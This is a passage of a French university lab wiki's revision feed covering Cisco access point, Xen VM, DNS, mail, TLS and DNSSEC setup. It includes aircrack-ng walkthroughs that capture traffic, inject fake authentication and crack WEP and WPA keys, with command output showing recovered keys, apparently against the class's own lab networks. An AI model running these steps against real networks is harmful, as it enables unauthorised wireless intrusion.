&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng --encrypt wpa mon0 -c 6 -w Poney --bssid 30:5A:3A:15:F6:3F&amp;lt;/pre&amp;gt;&lt;br /&gt;
--encrypt permet de sélectionner le type d'encryption souhaité.&lt;br /&gt;
&amp;lt;pre&amp;gt; CH  6 ][ Elapsed: 2 mins ][ 2016-11-21 16:18 ][ WPA handshake: 30:5A:3A:15:F6:3F                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  -34 100      738     1323   26   6  54e  WPA2 CCMP   PSK  Poneyus                                                &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 30:5A:3A:15:F6:3F  74:29:AF:F3:FD:91  -16    1e- 1     75      265                                                                   &lt;br /&gt;
 30:5A:3A:15:F6:3F  04:DB:56:3D:FD:A2  -40    0e- 0e  4709     1367 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un appareil doit se connecter sur notre réseau pour pouvoir avoir l'option &amp;lt;i&amp;gt;handshake&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et nous pouvons utiliser la commande&lt;br /&gt;
&amp;lt;pre&amp;gt; aircrack-ng Poney.cap dico.txt&amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande va tester chaque mot de passe 1 par 1 présent dans notre fichier dico.txt &lt;br /&gt;
Et au bout d'une heure nous parvenons à retrouver la clé WPA .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;                                 Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:16] 2857196 keys tested (792.44 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 02857193 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : E7 06 15 6B 6D BA 3F 42 AD 01 AF 05 DC A3 81 14 &lt;br /&gt;
                       D0 1A 64 4A B9 B3 C4 0B CF 4A 87 6F 80 FE 54 88 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : D1 40 F8 7B 0A 2E 00 9B DC 2D DE AD 1A 7A 19 07 &lt;br /&gt;
                       C5 D1 25 0C F3 18 3A 48 25 31 B0 57 40 93 41 30 &lt;br /&gt;
                       21 37 82 9F 56 2A 1A 97 F2 35 F3 F9 BC AF 42 14 &lt;br /&gt;
                       22 4B 49 EA 0A 2A 90 21 C9 F4 C0 13 80 1E 76 B2 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : B2 1E E7 D3 78 D6 1A 5F C8 36 63 E7 81 8B EE D1 &amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jturut</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35662</id>
		<title>TP sysres IMA2a5 2016/2017 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G4&amp;diff=35662"/>
				<updated>2016-12-06T11:17:18Z</updated>
		
		<summary type="html">&lt;p&gt;Jturut : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;TABLE BORDER=&amp;quot;1&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;CAPTION&amp;gt; Récapitulatif des IP &amp;lt;/CAPTION&amp;gt; &lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; N° VLAN &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Prénom &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Réseau local &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; Nom VM &amp;lt;/TH&amp;gt; &lt;br /&gt;
 &amp;lt;TH&amp;gt; @IP VM &amp;lt;/TH&amp;gt;&lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN20 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Dimitri &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.20.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Vald &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.182/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
  &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN21 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Nabil &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.21.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Pnl &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.177/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN22 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Otmane &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.22.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Lartiste &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.178/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt;&lt;br /&gt;
  &amp;lt;TR&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN23 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Hugo &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.23.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gradur &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.179/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Clement &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.24.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Gringe &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.180/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
 &amp;lt;TR&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; VLAN25 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Joan &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; 10.60.25.0/24 &amp;lt;/TD&amp;gt; &lt;br /&gt;
 &amp;lt;TD&amp;gt; Orelsan &amp;lt;/TD&amp;gt;&lt;br /&gt;
 &amp;lt;TD&amp;gt; 193.48.57.181/28 &amp;lt;/TD&amp;gt; &lt;br /&gt;
  &amp;lt;/TR&amp;gt; &lt;br /&gt;
&amp;lt;/TABLE&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés Cisco ==&lt;br /&gt;
&lt;br /&gt;
On vient dans un premier temps brancher le point d'accés Cisco et à l'aide de la commande ci dessous, on trouve sur quelle port USB se trouve notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;dmesg | grep tty&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour configurer notre Cisco, on utilise &amp;lt;i&amp;gt;minicom -os&amp;lt;/i&amp;gt; et pour cela nous devons être en root&lt;br /&gt;
&lt;br /&gt;
Une fois minicom lancé, on vient changer les paramètre de notre Cisco&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;A - Serial Device           : /dev/ttyUSB0&lt;br /&gt;
B - Lockfile Location       : /var/lock &lt;br /&gt;
C - Callin Program          :&lt;br /&gt;
D - Callout Program         :&lt;br /&gt;
E - Bps/Par/Bits            : 9600 8N1&lt;br /&gt;
F - Hardware Flow Control   : No&lt;br /&gt;
G - Software Flow Control   : No&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
On se connecte en admin sur le Cisco &lt;br /&gt;
&amp;lt;Pre&amp;gt;enable&lt;br /&gt;
config terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration du SSID&lt;br /&gt;
&amp;lt;pre&amp;gt;dot11 ssid MAMENE&lt;br /&gt;
authentication open&lt;br /&gt;
guest-mode&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuraiton de l'interface Dot11Radio0&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
encryption key 1 size 40bit 7 A3C2590B73A0 transmit-key&lt;br /&gt;
encryption mode wep mandatory&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accés a notre Cisco par adresse mac, on va chercher l'adresse mac des ordinateurs et venir les ajouter dans la liste d'accés de notre point d'accés&lt;br /&gt;
&amp;lt;pre&amp;gt;access-list 701 permit 5cb9.0180.a039   0000.0000.0000&lt;br /&gt;
access-list 701 permit 3ca8.2a7a.05c5   0000.0000.0000&lt;br /&gt;
access-list 701 permit 7429.aff3.fd91   0000.0000.0000&lt;br /&gt;
access-list 701 permit 5cb9.0180.a139   0000.0000.0000&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Installation d'une machine virtuelle ==&lt;br /&gt;
L'installation s'effectuée à l'aide du logiciel de virtualisation Xen. Nous possédons qu'un seul serveur pour 6. C'est pour cela qu'on passe par la création d'une machine virtuel pour que chacun puisse réaliser une serveur DNS, Apache sur sa machine virtuel.&lt;br /&gt;
Pour créer la machine virtuel, on tape la commande suivante :&lt;br /&gt;
&amp;lt;pre&amp;gt; xen-create-image --hostname Orelsan --ip 193.48.57.181 --netmask 255.255.255.240 --dir /usr/local/xen&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Entre deux séances de TP, nous avons eu un changement de version du kernel Linux. De ce fait il a fallu modifier le fichier &amp;lt;i&amp;gt;orelsan.cfg&amp;lt;/i&amp;gt; en remplaçant la version 3.14 en 3.16.0 &lt;br /&gt;
&amp;lt;pre&amp;gt; kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
 extra       = 'elevator=noop'&lt;br /&gt;
 ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lancement de notre machine virtuelle &lt;br /&gt;
&amp;lt;pre&amp;gt; xl create Orelsan.cvg &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Connection à notre machine virtuelle&lt;br /&gt;
&amp;lt;pre&amp;gt; xl console Orelsan &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut également voir la liste de toutes les machines virtuelles ouvertes avec :&lt;br /&gt;
&amp;lt;pre&amp;gt; xl list &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois la connexion sur notre machine établie, nous devons changer le fichier &amp;lt;i&amp;gt;interfaces&amp;lt;/i&amp;gt; pour permettre une connexion à internet:&lt;br /&gt;
&amp;lt;pre&amp;gt;# The loopback network interface&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
# The primary network interface&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
        address 193.48.57.181&lt;br /&gt;
        netmask 255.255.255.240&lt;br /&gt;
        gateway 193.48.57.190&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis pour prendre en compte ses modifications nous utilisons :&lt;br /&gt;
&amp;lt;pre&amp;gt;ifdown&lt;br /&gt;
ifup&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après un reboot de notre machine virtuelle, nous pouvons ainsi installer différents packages comme :&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install vim &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du service internet ==&lt;br /&gt;
Pour cela, il nous faut réaliser un serveur DNS qui permet de lier un nom de domaine à une adresse IP. Ainsi qu'un serveur Apache qui est un serveur HTTP&lt;br /&gt;
&lt;br /&gt;
=== Installation du serveur HTTP ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install apache2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Installation du serveur DNS ===&lt;br /&gt;
&amp;lt;pre&amp;gt; apt-get install bind9 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Si cette installation vous indique une erreur, il faut modifier le fichier  &amp;lt;i&amp;gt;/etc/apt/apt.conf.d/01proxy&amp;lt;/i&amp;gt;&lt;br /&gt;
et remplacer &lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://proxy.polytech-lille.fr:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
par&lt;br /&gt;
&amp;lt;pre&amp;gt; Acquire::http::Proxy &amp;quot;http://helfaut.escaut.net:3128&amp;quot;; &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette modification est du a la modification du proxy de l'école.&lt;br /&gt;
&lt;br /&gt;
===Configuration de notre nom de domaine===&lt;br /&gt;
&lt;br /&gt;
Après l'achat de notre nom de domaine &amp;lt;i&amp;gt;orelsan.website&amp;lt;/i&amp;gt; sur www.gandi.net on vient modifier le glue records pour lier notre adresse IP au nom de domaine&lt;br /&gt;
dns.orelsan.webiste -&amp;gt; 193.48.57.181&lt;br /&gt;
Ensuite on se rend dans l'onglet modifier les DNS et on change le DNS indiquer par celui vu juste précédemment.&lt;br /&gt;
Puis nous allons modifier 3 fichiers :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;options {&lt;br /&gt;
   allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   217.70.177.40/32 ; //passerelle de gandi  par defaut&lt;br /&gt;
 };&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/named.conf.local &amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;//&lt;br /&gt;
// Do any local configuration here&lt;br /&gt;
//&lt;br /&gt;
&lt;br /&gt;
// Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
// organization&lt;br /&gt;
//include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;orelsan.website&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/orelsan.website/orelsan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;i&amp;gt;/etc/bind/orelsan.website/orelsan&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$TTL 259200&lt;br /&gt;
@ IN SOA dns postmaster.orelsan.website. (&lt;br /&gt;
        20               ; Version&lt;br /&gt;
        7200             ; Refresh (2h)&lt;br /&gt;
        3600             ; Retry   (1h)&lt;br /&gt;
        1209600          ; Expire (14j)&lt;br /&gt;
        259200 )         ; Minimum TTL (3j)&lt;br /&gt;
         IN NS dns&lt;br /&gt;
         IN NS ns6.gandi.net.&lt;br /&gt;
         IN A       193.48.57.181&lt;br /&gt;
         IN MX      100 dns&lt;br /&gt;
&lt;br /&gt;
dns     IN A       193.48.57.181&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour prendre en compte les paramètres changés dans les fichiers ci-dessous, il suffit d'effectuer les commandes:&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 stop&lt;br /&gt;
service bind9 start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour observer le bon fonctionnement de notre serveur, on peut visualiser les informations sur&lt;br /&gt;
&lt;br /&gt;
&amp;lt;i&amp;gt;cat /var/log/daemon.log&amp;lt;/i&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis un ping de notre page internet peut nous montrer également son bon fonctionnement&lt;br /&gt;
Si tout cela fonctionne on peut se rendre sur notre page.&lt;br /&gt;
Pour modifier les informations visible sur la page, il suffit d'aller dans &lt;br /&gt;
&amp;lt;i&amp;gt;/var/www/html/index.html&amp;lt;/i&amp;gt;. Toutes les informations écrites dans ce fichier seront visible sur notre page.&lt;br /&gt;
&lt;br /&gt;
===Installation boite mail===&lt;br /&gt;
&lt;br /&gt;
On commence par un installer postfix qui est un serveur de messagerie électronique.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install postfix&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois postfix installé, on indique le nom de domaine (orelsan.website) dans la configuration&lt;br /&gt;
&lt;br /&gt;
Dans &amp;lt;i&amp;gt;/etc/aliases&amp;lt;/i&amp;gt; on ajoute:&lt;br /&gt;
&amp;lt;pre&amp;gt;admin:root&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis on utilise la commande&lt;br /&gt;
&amp;lt;pre&amp;gt;newaliases&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On installe également bsd-mailx qui est un agent de courriel utilisateur simple.&lt;br /&gt;
&amp;lt;pre&amp;gt;apt-get install bsd-mailx&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et pour observer nos mail, on tape la commande &amp;lt;i&amp;gt;mail&amp;lt;/i&amp;gt; dans la console.&lt;br /&gt;
L'adresse mail est admin@orelsan.website.&lt;br /&gt;
&lt;br /&gt;
===Générer une demande de certificat en SHA 2===&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha256 -keyout monserveur.key -out serveur.csr&lt;br /&gt;
&lt;br /&gt;
Country Name (2 letter code) [AU]:fr&lt;br /&gt;
State or Province Name (full name) [Some-State]:North&lt;br /&gt;
Locality Name (eg, city) []:Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Polytech&lt;br /&gt;
Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
Common Name (e.g. server FQDN or YOUR name) []:orelsan.website&lt;br /&gt;
Email Address []:admin@orelsan.website&lt;br /&gt;
&lt;br /&gt;
Please enter the following 'extra' attributes&lt;br /&gt;
to be sent with your certificate request&lt;br /&gt;
A challenge password []:&lt;br /&gt;
An optional company name []:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette fonction nous crée 2 fichiers :&lt;br /&gt;
monserveur.key	serveur.csr&lt;br /&gt;
&lt;br /&gt;
-monserveur.key contient la clé privée.&lt;br /&gt;
&lt;br /&gt;
-serveur.csr contient la clé public.&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter la clé public sur gandi pour qu'il nous génère un certificat.&lt;br /&gt;
On crée 2 fichier avec :&lt;br /&gt;
&lt;br /&gt;
-inter.crt qui contient le certificat intermédiaire.&lt;br /&gt;
&lt;br /&gt;
-gandi.crt qui qui contient le certificat .&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Orelsan:~# ls&lt;br /&gt;
gandi.crt  inter.crt  mbox  monserveur.key  serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &amp;lt;i&amp;gt;/etc/apache2/sites-enabled/000-default.conf&amp;lt;/i&amp;gt; on écrit: &lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
&lt;br /&gt;
        ServerName www.orelsan.website&lt;br /&gt;
        ServerAlias orelsan.website&lt;br /&gt;
        DocumentRoot /var/www/html&lt;br /&gt;
        CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
&lt;br /&gt;
        SSLEngine on&lt;br /&gt;
	SLCertificateFile /root/gandi.crt&lt;br /&gt;
        SSLCertificateKeyFile /root/monserveur.key&lt;br /&gt;
        SSLCertificateChainFile /root/inter.crt&lt;br /&gt;
	SSLVerifyClient None&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous ajoutons l'option ci dessous dans le fichier &amp;lt;i&amp;gt;named.conf.options&amp;lt;/i&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-enable yes &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Dans un répertoire, nous créons d'abord la clé asymétrique de signature puis celle de zone :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE orelsan.website &lt;br /&gt;
dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE orelsan.website&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après avoir renommé les noms de nos clé, nous ajoutons dans notre fichier de zone &lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/orelsan.website.dnssec/orelsan.website-ksk.key&lt;br /&gt;
$include /etc/bind/orelsan.website.dnssec/orelsan.website-zsk.key &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
et pour signez les enregistrements de la zone, nous utilisons la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;dnssec-signzone -o orelsan.website -k orelsan.website-ksk ../orelsan.website/orelsan orelsan.website-zsk&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Cassage clé ==&lt;br /&gt;
Pour le crackage de clé, nous allons utiliser le package aircrack-ng qui est un ensemble d'outils permettant de tester la sécurité d'un réseau&lt;br /&gt;
=== Cassage de clé WEP ===&lt;br /&gt;
Commençons par detecter notre interface wifi par le biais d'un&lt;br /&gt;
&amp;lt;pre&amp;gt;ifconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
ou&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre interface est wlan2 qui correspond à la clé wifi ajoutée sur l'ordinateur.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons ainsi commencer à utiliser les outils de aircrack en debutant par &lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wlan2 &amp;lt;/pre&amp;gt;&lt;br /&gt;
Cette commande permet de mettre en mode moniteur notre interface wifi&lt;br /&gt;
Si tout se passe correctement, vous allez voir apparaitre&lt;br /&gt;
&amp;lt;pre&amp;gt;creation du mon0&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan2		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous observons bien que le mode moniteur est activé pour notre wlan2.&lt;br /&gt;
&lt;br /&gt;
Nous pouvons observer tous les réseaux grâce à la commande &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng wlan2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons repéré  la cracotte que nous voulons cracker on refait un airodump pour se focaliser sur cette cracotte&lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng  wlan2 -c 8 -essid cracotte03 --bssid 04:DA:D2:9C:50:52 -w crack&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-c permet de le selectrionner le channel de communication&lt;br /&gt;
-w le nom du fichier dans lequel airodump va enregistrer les données&lt;br /&gt;
--bssid permet d'indiquer l'adresse mac de la cible &lt;br /&gt;
--essid permet d'indique le ssid de la cible (nom du réseau)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  8 ][ Elapsed: 1 min ][ 2016-11-21 15:08                                         &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  -41  45      799    53316  506   8  54e. WEP  WEP         cracotte03                                             &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                           &lt;br /&gt;
                                                                                                                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -28   54e-54e   222    60221&amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
On peut visualiser le nombre de paquets qui transit. &lt;br /&gt;
Pour permettre le crackage de la clé WEP, un nombre de data important est necessaire. Pour obtenir plus de data, nous pouvons utiliser la commande aireplay dans un autre terminal.&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52 wlan2&lt;br /&gt;
No source MAC (-h) specified. Using the device MAC (40:A5:EF:05:AA:25)&lt;br /&gt;
15:00:01  Waiting for beacon frame (BSSID: 04:DA:D2:9C:50:51) on channel 8&lt;br /&gt;
&lt;br /&gt;
15:00:01  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:03  Sending Authentication Request (Open System)&lt;br /&gt;
&lt;br /&gt;
15:00:05  Sending Authentication Request (Open System) [ACK]&lt;br /&gt;
15:00:05  Authentication successful&lt;br /&gt;
15:00:05  Sending Association Request [ACK]&lt;br /&gt;
15:00:05  Association successful :-) (AID: 1) &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et tout en laissant airodump ouvert sur un terminal, on vient trouver la clé WEP en utilisant la commande ci dessous dans un autre terminal&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Piranha:/home/pifou#aircrack-ng crack.cap &lt;br /&gt;
                                                            Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                            [00:00:39] Tested 257766 keys (got 32866 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(46080) B9(39936) 70(39680) B2(39168) 86(38656) 11(38400) B4(38400) F2(38400) A1(38144) 24(37632) &lt;br /&gt;
    1    0/  1   EE(45824) 11(44544) 7B(42240) 05(40960) 93(40448) C4(40448) EE(40448) 1C(39168) 3E(39168) 42(38912) &lt;br /&gt;
    2    0/  1   EE(45568) 36(42240) 6A(42240) 0D(40192) DC(39680) 98(39424) F3(39424) 39(39168) 3E(38912) B6(38656) &lt;br /&gt;
    3    0/  1   EE(48640) 11(43520) 61(40448) E6(40448) 00(38912) 9C(38656) EF(38656) 30(38400) B7(38400) 2A(38144) &lt;br /&gt;
    4    0/  1   EE(42240) 77(40960) AA(39936) 86(39424) F2(39168) FE(39168) 95(38912) 69(38656) 73(38656) AF(38656) &lt;br /&gt;
    5    1/  2   EE(42752) A2(41728) 34(41216) 46(40448) 0B(39680) 50(39424) 6C(39168) BA(39168) 7D(38912) 66(38656) &lt;br /&gt;
    6    0/  1   EE(44032) 8D(43264) 9F(40960) A0(40960) 74(40704) 17(40448) 91(39936) 66(39424) 5A(39168) C4(38912) &lt;br /&gt;
    7    0/  1   EE(44032) 36(40192) 4D(39680) 3D(39168) BF(39168) EC(38912) 9D(38656) EF(38656) A9(38400) B4(38144) &lt;br /&gt;
    8    0/  1   EE(48128) 35(40448) C1(39680) 9E(39424) F3(39424) C8(39168) 36(38656) 2E(38144) 7A(38144) C5(38144) &lt;br /&gt;
